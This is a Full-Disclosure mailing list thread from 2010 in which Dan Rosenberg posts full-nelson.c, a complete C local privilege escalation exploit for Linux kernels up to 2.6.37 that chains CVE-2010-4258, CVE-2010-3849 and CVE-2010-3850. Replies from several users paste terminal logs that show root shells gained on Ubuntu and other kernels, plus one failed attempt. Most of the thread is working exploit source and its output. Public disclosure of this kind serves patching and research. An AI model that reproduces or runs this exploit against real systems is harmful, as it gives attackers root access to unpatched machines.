Failed on Ubuntu 10.10 " uname -a; Linux admin-desktop 2.6.35-23-generic #41-Ubuntu SMP Wed Nov 24 10:18:49 UTC 2010 i686 GNU/Linux
[*] Resolving kernel addresses... [+] Resolved econet_ioctl to 0xe0858340 [+] Resolved econet_ops to 0xe0858440 [+] Resolved commit_creds to 0xc016c8d0 [+] Resolved prepare_kernel_cred to 0xc016cd20 [*] Calculating target... [*] Failed to set Econet address. [*] Triggering payload... [*] Exploit failed to get root. " 2010/12/8 David Flores <[email protected]> > > :~$ gcc nel.c > :~$ ./a.out > [*] Resolving kernel addresses... > [+] Resolved econet_ioctl to 0xf9c47280 > [+] Resolved econet_ops to 0xf9c47360 > [+] Resolved commit_creds to 0xc01625a0 > [+] Resolved prepare_kernel_cred to 0xc01627a0 > [*] Calculating target... > [*] Triggering payload... > [*] Got root! > # whoami > > root > # id > uid=0(root) gid=0(root) > # uname -a > Linux sistemas 2.6.31-22-generic #65-Ubuntu SMP Thu Sep 16 15:48:58 UTC > 2010 i686 GNU/Linux > # > > On Wed, Dec 8, 2010 at 14:56, Benji <[email protected]> wrote: > >> working here aswell >> >> ownst...@local[~]$ uname -a >> FreeBSD local 8.1-RELEASE-p1 FreeBSD 8.1-RELEASE-p1 #4: Thu Sep 23 >> 08:30:18 UTC 2010 r...@benjir0x:/*usr*/*obj*/*usr*/*src*/*sys*/GENERIC >> amd64 >> ownst...@local[~]$ ./w00tw00t >> >> [*] Resolving kernel addresses... >> [+] Resolved econet_ioctl to 0xffffffffa0239510 >> [+] Resolved econet_ops to 0xffffffffa0239600 >> [+] Resolved commit_creds to 0xffffffff8108bd90 >> [+] Resolved prepare_kernel_cred to 0xffffffff8108c170 >> [*] Calculating target... >> >> [*] Failed to set Econet address. >> [*] Triggering payload... >> [*] Got root! >> # id >> uid=0(root) gid=0(root) >> # >> >> On Wed, Dec 8, 2010 at 7:15 PM, leandro_lista < >> [email protected]> wrote: >> >>> Works in kernel 2.6.32-24 >>> >>> >>> >>> Linux indzin-desktop 2.6.32-24-generic #41-Ubuntu SMP Thu Aug 19 01:38:40 >>> UTC 2010 x86_64 GNU/Linux >>> >>> ind...@indzin-desktop:~$ ./nels >>> [*] Resolving kernel addresses... >>> [+] Resolved econet_ioctl to 0xffffffffa0239510 >>> [+] Resolved econet_ops to 0xffffffffa0239600 >>> [+] Resolved commit_creds to 0xffffffff8108bd90 >>> [+] Resolved prepare_kernel_cred to 0xffffffff8108c170 >>> [*] Calculating target... >>> >>> [*] Failed to set Econet address. >>> [*] Triggering payload... >>> [*] Got root! >>> # id >>> uid=0(root) gid=0(root) >>> # >>> >>> >>> :) >>> >>> >>> >>> >>> -----Original Message----- >>> *From*: Cal Leeming [Simplicity Media Ltd] < >>> [email protected]<%22cal%20leeming%20%5bsimplicity%20media%20ltd%5d%22%20%[email protected]%3e> >>> > >>> *Reply-to*: [email protected] >>> *To*: Dan Rosenberg >>> <[email protected]<dan%20rosenberg%20%[email protected]%3e> >>> > >>> *Cc*: [email protected], [email protected] >>> *Subject*: Re: [Full-disclosure] Linux kernel exploit >>> *Date*: Tue, 07 Dec 2010 21:06:44 +0000 >>> >>> Anyone tested this in sandbox yet? >>> >>> On 07/12/2010 20:25, Dan Rosenberg wrote: >>> > Hi all, >>> > >>> > I've included here a proof-of-concept local privilege escalation exploit >>> > for Linux. Please read the header for an explanation of what's going >>> > on. Without further ado, I present full-nelson.c: >>> > >>> > Happy hacking, >>> > Dan >>> > >>> > >>> > --snip-- >>> > >>> > /* >>> > * Linux Kernel<= 2.6.37 local privilege escalation >>> > * by Dan Rosenberg >>> > * @djrbliss on twitter >>> > * >>> > * Usage: >>> > * gcc full-nelson.c -o full-nelson >>> > * ./full-nelson >>> > * >>> > * This exploit leverages three vulnerabilities to get root, all of >>> > which were >>> > * discovered by Nelson Elhage: >>> > * >>> > * CVE-2010-4258 >>> > * ------------- >>> > * This is the interesting one, and the reason I wrote this exploit. If >>> > a >>> > * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a >>> > NULL >>> > * word will be written to a user-specified pointer when that thread >>> > exits. >>> > * This write is done using put_user(), which ensures the provided >>> > destination >>> > * resides in valid userspace by invoking access_ok(). However, Nelson >>> > * discovered that when the kernel performs an address limit override via >>> > * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page >>> > fault, >>> > * etc.), this override is not reverted before calling put_user() in the >>> > exit >>> > * path, allowing a user to write a NULL word to an arbitrary kernel >>> > address. >>> > * Note that this issue requires an additional vulnerability to trigger. >>> > * >>> > * CVE-2010-3849 >>> > * ------------- >>> > * This is a NULL pointer dereference in the Econet protocol. By >>> > itself, it's >>> > * fairly benign as a local denial-of-service. It's a perfect candidate >>> > to >>> > * trigger the above issue, since it's reachable via sock_no_sendpage(), >>> > which >>> > * subsequently calls sendmsg under KERNEL_DS. >>> > * >>> > * CVE-2010-3850 >>> > * ------------- >>> > * I wouldn't be able to reach the NULL pointer dereference and trigger >>> > the >>> > * OOPS if users weren't able to assign Econet addresses to arbitrary >>> > * interfaces due to a missing capabilities check. >>> > * >>> > * In the interest of public safety, this exploit was specifically >>> > designed to >>> > * be limited: >>> > * >>> > * * The particular symbols I resolve are not exported on Slackware or >>> > Debian >>> > * * Red Hat does not support Econet by default >>> > * * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu >>> > and >>> > * Debian >>> > * >>> > * However, the important issue, CVE-2010-4258, affects everyone, and it >>> > would >>> > * be trivial to find an unpatched DoS under KERNEL_DS and write a >>> > slightly >>> > * more sophisticated version of this that doesn't have the roadblocks I >>> > put in >>> > * to prevent abuse by script kiddies. >>> > * >>> > * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64. >>> > * >>> > * NOTE: the exploit process will deadlock and stay in a zombie state >>> > after you >>> > * exit your root shell because the Econet thread OOPSes while holding >>> > the >>> > * Econet mutex. It wouldn't be too hard to fix this up, but I didn't >>> > bother. >>> > * >>> > * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla >>> > */ >>> > >>> > #include<stdio.h> >>> > #include<sys/socket.h> >>> > #include<fcntl.h> >>> > #include<sys/ioctl.h> >>> > #include<string.h> >>> > #include<net/if.h> >>> > #include<sched.h> >>> > #include<stdlib.h> >>> > #include<signal.h> >>> > #include<sys/utsname.h> >>> > #include<sys/mman.h> >>> > #include<unistd.h> >>> > >>> > /* How many bytes should we clear in our >>> > * function pointer to put it into userspace? */ >>> > #ifdef __x86_64__ >>> > #define SHIFT 24 >>> > #define OFFSET 3 >>> > #else >>> > #define SHIFT 8 >>> > #define OFFSET 1 >>> > #endif >>> > >>> > /* thanks spender... */ >>> > unsigned long get_kernel_sym(char *name) >>> > { >>> > FILE *f; >>> > unsigned long addr; >>> > char dummy; >>> > char sname[512]; >>> > struct utsname ver; >>> > int ret; >>> > int rep = 0; >>> > int oldstyle = 0; >>> > >>> > f = fopen("/proc/kallsyms", "r"); >>> > if (f == NULL) { >>> > f = fopen("/proc/ksyms", "r"); >>> > if (f == NULL) >>> > goto fallback; >>> > oldstyle = 1; >>> > } >>> > >>> > repeat: >>> > ret = 0; >>> > while(ret != EOF) { >>> > if (!oldstyle) >>> > ret = fscanf(f, "%p %c %s\n", (void **)&addr,&dummy, >>> > sname); >>> > else { >>> > ret = fscanf(f, "%p %s\n", (void **)&addr, sname); >>> > if (ret == 2) { >>> > char *p; >>> > if (strstr(sname, "_O/") || strstr(sname, >>> > "_S.")) >>> > continue; >>> > p = strrchr(sname, '_'); >>> > if (p> ((char *)sname + 5)&& !strncmp(p - 3, >>> > "smp", 3)) { >>> > p = p - 4; >>> > while (p> (char *)sname&& *(p - 1) == >>> > '_') >>> > p--; >>> > *p = '\0'; >>> > } >>> > } >>> > } >>> > if (ret == 0) { >>> > fscanf(f, "%s\n", sname); >>> > continue; >>> > } >>> > if (!strcmp(name, sname)) { >>> > fprintf(stdout, " [+] Resolved %s to %p%s\n", name, >>> > (void *)addr, rep ? " (via System.map)" : ""); >>> > fclose(f); >>> > return addr; >>> > } >>> > } >>> > >>> > fclose(f); >>> > if (rep) >>> > return 0; >>> > fallback: >>> > uname(&ver); >>> > if (strncmp(ver.release, "2.6", 3)) >>> > oldstyle = 1; >>> > sprintf(sname, "/boot/System.map-%s", ver.release); >>> > f = fopen(sname, "r"); >>> > if (f == NULL) >>> > return 0; >>> > rep = 1; >>> > goto repeat; >>> > } >>> > >>> > typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long >>> > cred); >>> > typedef unsigned long __attribute__((regparm(3))) (* >>> > _prepare_kernel_cred)(unsigned long cred); >>> > _commit_creds commit_creds; >>> > _prepare_kernel_cred prepare_kernel_cred; >>> > >>> > static int __attribute__((regparm(3))) >>> > getroot(void * file, void * vma) >>> > { >>> > >>> > commit_creds(prepare_kernel_cred(0)); >>> > return -1; >>> > >>> > } >>> > >>> > /* Why do I do this? Because on x86-64, the address of >>> > * commit_creds and prepare_kernel_cred are loaded relative >>> > * to rip, which means I can't just copy the above payload >>> > * into my landing area. */ >>> > void __attribute__((regparm(3))) >>> > trampoline() >>> > { >>> > >>> > #ifdef __x86_64__ >>> > asm("mov $getroot, %rax; call *%rax;"); >>> > #else >>> > asm("mov $getroot, %eax; call *%eax;"); >>> > #endif >>> > >>> > } >>> > >>> > /* Triggers a NULL pointer dereference in econet_sendmsg >>> > * via sock_no_sendpage, so it's under KERNEL_DS */ >>> > int trigger(int * fildes) >>> > { >>> > int ret; >>> > struct ifreq ifr; >>> > >>> > memset(&ifr, 0, sizeof(ifr)); >>> > strncpy(ifr.ifr_name, "eth0", IFNAMSIZ); >>> > >>> > ret = ioctl(fildes[2], SIOCSIFADDR,&ifr); >>> > >>> > if(ret< 0) { >>> > printf("[*] Failed to set Econet address.\n"); >>> > return -1; >>> > } >>> > >>> > splice(fildes[3], NULL, fildes[1], NULL, 128, 0); >>> > splice(fildes[0], NULL, fildes[2], NULL, 128, 0); >>> > >>> > /* Shouldn't get here... */ >>> > exit(0); >>> > } >>> > >>> > int main(int argc, char * argv[]) >>> > { >>> > unsigned long econet_ops, econet_ioctl, target, landing; >>> > int fildes[4], pid; >>> > void * newstack, * payload; >>> > >>> > /* Create file descriptors now so there are two >>> > references to them after cloning...otherwise >>> > the child will never return because it >>> > deadlocks when trying to unlock various >>> > mutexes after OOPSing */ >>> > pipe(fildes); >>> > fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0); >>> > fildes[3] = open("/dev/zero", O_RDONLY); >>> > >>> > if(fildes[0]< 0 || fildes[1]< 0 || fildes[2]< 0 || fildes[3]< 0) { >>> > printf("[*] Failed to open file descriptors.\n"); >>> > return -1; >>> > } >>> > >>> > /* Resolve addresses of relevant symbols */ >>> > printf("[*] Resolving kernel addresses...\n"); >>> > econet_ioctl = get_kernel_sym("econet_ioctl"); >>> > econet_ops = get_kernel_sym("econet_ops"); >>> > commit_creds = (_commit_creds) get_kernel_sym("commit_creds"); >>> > prepare_kernel_cred = (_prepare_kernel_cred) >>> > get_kernel_sym("prepare_kernel_cred"); >>> > >>> > if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || >>> > !econet_ops) { >>> > printf("[*] Failed to resolve kernel symbols.\n"); >>> > return -1; >>> > } >>> > >>> > if(!(newstack = malloc(65536))) { >>> > printf("[*] Failed to allocate memory.\n"); >>> > return -1; >>> > } >>> > >>> > printf("[*] Calculating target...\n"); >>> > target = econet_ops + 10 * sizeof(void *) - OFFSET; >>> > >>> > /* Clear the higher bits */ >>> > landing = econet_ioctl<< SHIFT>> SHIFT; >>> > >>> > payload = mmap((void *)(landing& ~0xfff), 2 * 4096, >>> > PROT_READ | PROT_WRITE | PROT_EXEC, >>> > MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0); >>> > >>> > if ((long)payload == -1) { >>> > printf("[*] Failed to mmap() at target address.\n"); >>> > return -1; >>> > } >>> > >>> > memcpy((void *)landing,&trampoline, 1024); >>> > >>> > clone((int (*)(void *))trigger, >>> > (void *)((unsigned long)newstack + 65536), >>> > CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD, >>> > &fildes, NULL, NULL, target); >>> > >>> > sleep(1); >>> > >>> > printf("[*] Triggering payload...\n"); >>> > ioctl(fildes[2], 0, NULL); >>> > >>> > if(getuid()) { >>> > printf("[*] Exploit failed to get root.\n"); >>> > return -1; >>> > } >>> > >>> > printf("[*] Got root!\n"); >>> > execl("/bin/sh", "/bin/sh", NULL); >>> > } >>> > >>> > >>> > _______________________________________________ >>> > Full-Disclosure - We believe in it. >>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> > Hosted and sponsored by Secunia - http://secunia.com/ >>> > >>> >>> >>> >>> _______________________________________________ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >>> >> >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > > -- > David Flores Velázquez > Email: [email protected] > > <http://twitter.com/dmouse> > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
